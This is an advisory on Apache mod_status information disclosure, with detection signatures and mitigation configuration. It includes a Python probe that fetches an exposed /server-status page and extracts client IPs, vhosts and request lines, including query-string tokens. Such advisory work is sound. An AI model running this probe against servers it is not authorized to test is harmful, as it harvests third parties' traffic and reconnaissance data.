The Apache HTTP Server module mod_status reports on the server's activity and performance. When enabled, it serves a status page, by default at /server-status, that shows real-time information about the host and the traffic it is handling: uptime and CPU usage, the HTTP requests currently being processed, the client IP addresses making them, the requested paths (including any query strings), and the virtual hosts serving them. This gives a potential attacker reconnaissance data to aid further attacks and can disclose sensitive traffic details. No authentication is required to exploit this information disclosure vulnerability: it is a single unauthenticated HTTP request.
Exploitation
Stages
- The attacker makes an HTTP GET request to http://<host>/server-status (or to http://<host>/server-status?auto for the machine-readable variant).
- The webserver responds with the mod_status server-status page, providing host information and the list of in-flight requests with their client addresses, virtual hosts and request lines.
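The two stages above, as an added example that is not part of the original advisory: a small probe that fetches /server-status, decides whether the host is exposed, and pulls out what an attacker would harvest from the response. The sample bodies below are constructed, not captured from any real host, and the URL you pass to probe() is your own; the host 203.0.113.9, vhost names and request lines are placeholders.

```python
"""Probe for an exposed Apache mod_status page and extract what it leaks.

Added example (not from the original advisory). SAMPLE_AUTO and SAMPLE_HTML
are constructed test inputs; all names and addresses in them are placeholders.
"""
import sys
import urllib.error
import urllib.request
from html.parser import HTMLParser

# Constructed sample of the machine-readable "?auto" output.
# BusyWorkers/IdleWorkers are chosen to match the scoreboard line.
SAMPLE_AUTO = """\
Total Accesses: 12345
Total kBytes: 67890
Uptime: 86400
BusyWorkers: 3
IdleWorkers: 2
Scoreboard: WW_K_.......
"""

# Constructed fragment of the HTML page as shown with ExtendedStatus On.
# The per-worker table is where client IPs, vhosts and request lines leak.
SAMPLE_HTML = """<html><head><title>Apache Status</title></head><body>
<table border="0">
<tr><th>Srv</th><th>PID</th><th>M</th><th>Client</th><th>VHost</th><th>Request</th></tr>
<tr><td>0-0</td><td>4021</td><td>W</td><td>203.0.113.9</td><td>intranet.example.test</td><td>GET /admin/export?token=abc123 HTTP/1.1</td></tr>
<tr><td>1-0</td><td>4022</td><td>K</td><td>198.51.100.4</td><td>www.example.test</td><td>GET /login HTTP/1.1</td></tr>
</table></body></html>"""


def probe(url, timeout=5):
    """GET url and return (status, body). Error responses such as 403/404 are
    returned with an empty body rather than raised, so the caller can tell
    'access denied' (correctly configured) from 'exposed'."""
    req = urllib.request.Request(url, headers={"User-Agent": "status-probe/1.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, ""


def looks_like_status(status, body):
    """True if the response is an unauthenticated mod_status page: a 200 whose
    body carries either the ?auto key line or the HTML page title."""
    return status == 200 and (
        "Total Accesses:" in body or "<title>Apache Status</title>" in body
    )


def parse_auto(body):
    """Turn the 'Key: value' lines of the ?auto output into a dict of strings."""
    fields = {}
    for line in body.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def busy_from_scoreboard(scoreboard):
    """Count active slots in the scoreboard string: '_' is a worker waiting
    for a connection and '.' an open slot; every other letter (W, R, K, C,
    L, ...) is a worker handling a connection."""
    return sum(1 for c in scoreboard if c not in "_.")


class _WorkerTable(HTMLParser):
    """Collect table rows as lists of cell text."""

    def __init__(self):
        super().__init__()
        self.rows, self._row, self._cell, self._in_cell = [], [], "", False

    def handle_starttag(self, tag, attrs):
        if tag == "tr":
            self._row = []
        if tag in ("td", "th"):
            self._in_cell, self._cell = True, ""

    def handle_data(self, data):
        if self._in_cell:
            self._cell += data

    def handle_endtag(self, tag):
        if tag in ("td", "th"):
            self._row.append(self._cell.strip())
            self._in_cell = False
        if tag == "tr" and self._row:
            self.rows.append(self._row)


def leaked_requests(html):
    """Return [(client, vhost, request), ...] from the worker table, locating
    the columns by header name so the column order does not matter."""
    p = _WorkerTable()
    p.feed(html)
    wanted = ("Client", "VHost", "Request")
    if not p.rows or not set(wanted) <= set(p.rows[0]):
        return []
    idx = {name: p.rows[0].index(name) for name in wanted}
    width = max(idx.values())
    return [tuple(r[idx[n]] for n in wanted) for r in p.rows[1:] if len(r) > width]


if __name__ == "__main__":
    # Usage: python probe_status.py http://<host>/server-status
    status, body = probe(sys.argv[1])
    if not looks_like_status(status, body):
        print(f"not exposed (HTTP {status})")
    else:
        for client, vhost, request in leaked_requests(body):
            print(f"{client} -> {vhost}: {request}")
```

A 403 from probe() is the expected result on a correctly restricted server; a 200 whose body parses is a finding, and the Request column shows why it matters: full request lines, query strings included, are visible to anyone who can reach the page.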
Prerequisites
The public-facing host is running Apache with mod_status loaded, and the /server-status location has no access control. Enabling the handler does not add any restriction by itself, so a bare `SetHandler server-status` block without a Require (2.4) or Allow/Deny (2.2) directive is reachable by anyone who can reach the virtual host.
Alert Logic Coverage
Alert Logic® has evaluated its customer base for exposure to this issue and has developed signatures for detecting it, depending on the security service in place.
The Network-Based Intrusion Detection System (IDS) in Alert Logic Threat Manager™ has been updated with signatures for this exploit. When a signature fires, an incident is generated in the Alert Logic console.
Recommendations for Mitigation
Establish access control for mod_status: restrict the /server-status location to loopback and trusted monitoring addresses, and disable the module entirely on hosts that do not need it. Verify the fix from an untrusted network position; the page should answer 403, not 200.
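The weak and the corrected configuration side by side, as an added example that is not from the original advisory or from the Apache project's own sample configuration. The monitoring address 10.0.0.5 is a placeholder; substitute your own.

```apache
# Weak: the handler is enabled with no access directives, so every client
# that can reach this virtual host can read the status page.
<Location "/server-status">
    SetHandler server-status
</Location>

# Corrected (Apache 2.4 syntax). Multiple Require lines inside a Location
# are combined as "any", so loopback and the monitoring host are allowed
# and everything else gets 403. 10.0.0.5 is a placeholder address.
<Location "/server-status">
    SetHandler server-status
    Require local
    Require ip 10.0.0.5
</Location>

# The per-request table (client IP, vhost, request line) is only shown with
# ExtendedStatus On, which is the default when mod_status is loaded on
# 2.3.6 and later. Turn it off unless that detail is actually needed.
ExtendedStatus Off

# Apache 2.2 equivalent of the restricted block:
# <Location "/server-status">
#     SetHandler server-status
#     Order deny,allow
#     Deny from all
#     Allow from 127.0.0.1 10.0.0.5
# </Location>
```

After reloading, confirm from an external address that `curl -sI http://<host>/server-status` returns 403 and from the allowed host that it returns 200. On hosts that never need the page, unloading the module (for example `a2dismod status` on Debian-based systems) removes the exposure entirely rather than relying on the location rules.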